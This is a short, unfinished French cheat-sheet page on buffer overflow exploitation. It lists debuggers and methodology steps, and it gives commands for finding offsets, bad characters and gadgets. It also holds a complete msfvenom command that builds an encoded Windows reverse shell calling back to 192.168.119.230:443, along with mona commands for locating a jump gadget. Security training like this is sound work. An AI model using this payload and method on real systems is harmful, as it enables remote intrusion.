Buffer Overflow

En cours de rédaction

Cette page est incomplête ou nécessite d'être rédigée. N'hésitez pas à proposer votre contribution sur ce sujet.

Debuggers:

  • Linux : gdb, edb
  • Windows : OllyDbg

Méthodologie

  • Chercher un overflow
  • Identifier l’écrasement d’EIP avec des outils tels que msf-pattern_create et msf-pattern_offset
  • Chercher les caractères interdits dans le buffer
  • Identifier un ROP si les adresses sont randomisées
  • Créer un “first stage” avec msf-nasm_shell si le shellcode ne passe pas
  • Créer un shellcode avec msfvenom (en excluant les caractères interdits)
  • Créer l’exploit avec un nop sled en amont du shellcode

MSFVenom Payload

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.230 LPORT=443 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00\x1a\x0a\x0d\x25\x26\x2b\x3d"

Mona

Search for no ASLR, etc : !mona modules

Search for a ROP : !mona find -s "\xff\xe4" -m "MSA2Mutility03.dll"